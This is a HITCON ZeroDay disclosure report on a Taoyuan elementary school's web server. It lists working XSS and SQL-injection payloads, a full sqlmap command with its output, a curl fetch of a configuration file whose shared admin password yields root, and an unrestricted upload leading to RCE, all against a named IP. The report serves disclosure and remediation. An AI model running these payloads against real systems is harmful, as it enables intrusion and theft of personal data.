Vulnerability Overview

ZDID: ZD-2022-00479
發信 Vendor: TACERT台灣學術網路危機處理中心
Title: 桃園國小存在 SQLi, XSS, Unrestricted file upload, Configuration file source code disclosure, RCE, Root
Introduction: SQLi, XSS, Unrestricted file upload, Configuration file source code disclosure, RCE, Root

處理狀態

目前狀態

公開

Last Update : 2022/09/17

新提交
已審核
已通報
未回報修補狀況
未複測
公開

處理歷程

2022/07/18 14:31:15 : 新提交 (由 entroy 更新此狀態)
2022/07/19 18:43:30 : 審核完成 (由 HITCON ZeroDay 服務團隊更新此狀態)
2022/07/24 14:32:28 : 修補中 (由 HITCON ZeroDay 服務團隊更新此狀態)
2022/07/24 14:32:28 : 審核完成 (由 HITCON ZeroDay 服務團隊更新此狀態)
2022/07/24 14:32:28 : 修補中 (由 HITCON ZeroDay 服務團隊更新此狀態)
2022/09/17 03:00:02 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

ZDID：ZD-2022-00479
通報者：entroy (entroy)
風險：嚴重
類型：資料庫注入攻擊 (SQL Injection)

參考資料

攻擊者可利用該漏洞取得後端資料庫權限及完整資料（包含大量使用者個資或敏感性資料），同時也有機會對資料進行破壞或修改。

漏洞說明： OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection

漏洞說明： OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection

漏洞說明： CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html

防護方式： OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet

(本欄位資訊由系統根據漏洞類別自動產生，做為漏洞參考資料。)

敘述

桃園國小

XSS

payload:

http://163.30.44.17/active/index_look4.php?num=4812%22%3E%20%3Cscript%3Ealert(1)%3C/script%3E

大概列一下，滿多的

http://163.30.44.17/active/index_look4.php
http://163.30.44.17/active/index_look.php
http://163.30.44.17/teacher/lookt.php
http://163.30.44.17/active/index_look5.php
http://163.30.44.17/tyes_dep/
http://163.30.44.17/exam/exam.php 
http://163.30.44.17/talk/look.php
...

SQLi

payload:

sqlmap http://163.30.44.17/active/index_look.php\?num\=4812\&the_page\=1\&title\=110%BE%C7%A6\~%AB%D7%A5%FE%B0%EA%BE%C7%A5%CD%A8%E0%B5%A3%BBR%C1%D0%A4%F1%C1%C9\(%A5D%C3D%A1G%A4p%A4p%A7%D4%AA%CC%A8%BE%AC%CC%BD%EC\)\&new\=yes\&search\= -p num --level 5 --risk 3 --batch --random-agent --technique BU

有問題的網址參數

http://163.30.44.17/active/index_look4.php, num
http://163.30.44.17/active/index_look5.php, num

result:

---
Parameter: num (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: num=4812 AND 2628=2628&the_page=1&title=110%BE%C7%A6~%AB%D7%A5%FE%B0%EA%BE%C7%A5%CD%A8%E0%B5%A3%BBR%C1%D0%A4%F1%C1%C9(%A5D%C3D%A1G%A4p%A4p%A7%D4%AA%CC%A8%BE%AC%CC%BD%EC)&new=yes&search=

Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: num=4812 UNION ALL SELECT CONCAT(0x716b7a7171,0x424a7561756c50654a4d665746727654794d4c6c6f6f495063647948484974554652546d4f76706d,0x717a7a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&the_page=1&title=110%BE%C7%A6~%AB%D7%A5%FE%B0%EA%BE%C7%A5%CD%A8%E0%B5%A3%BBR%C1%D0%A4%F1%C1%C9(%A5D%C3D%A1G%A4p%A4p%A7%D4%AA%CC%A8%BE%AC%CC%BD%EC)&new=yes&search=
---
[14:05:50] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Fedora 9 (Sulphur)
web application technology: PHP 5.2.6, Apache 2.2.8, PHP
back-end DBMS: MySQL 5

Configuration file

payload:

curl http://163.30.44.17/calendar/include/config.inc

這個密碼是管理員的通用密碼，可以用這一個密碼拿到機器的 root

phpinfo

http://163.30.44.17/info.php

Unrestricted file upload

http://163.30.44.17/nine_year_one/

可以上傳任意檔案，造成 RCE

Root

因為管理員使用的密碼都是同一組，所以可以直接用這組密碼拿到 root

其他

看了一下 source code，發現有一些地方的 admin page 判斷是用 hard code 的方式判斷的，建議不要這樣做 ...
如果可以的話，用框架重新弄會比較好，需要修的地方滿多的

擷圖

留言討論

聯絡組織

發送私人訊息

您也可以透過私人訊息的方式與組織聯繫，討論有關於這個漏洞的相關資訊。

桃園國小存在 SQLi, XSS, Unrestricted file upload, Configuration file source code disclosure, RCE, Root - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

處理狀態

目前狀態

處理歷程

詳細資料

參考資料

相關網址

敘述

桃園國小

XSS

SQLi

Configuration file

phpinfo

Unrestricted file upload

Root

其他

擷圖

留言討論

聯絡組織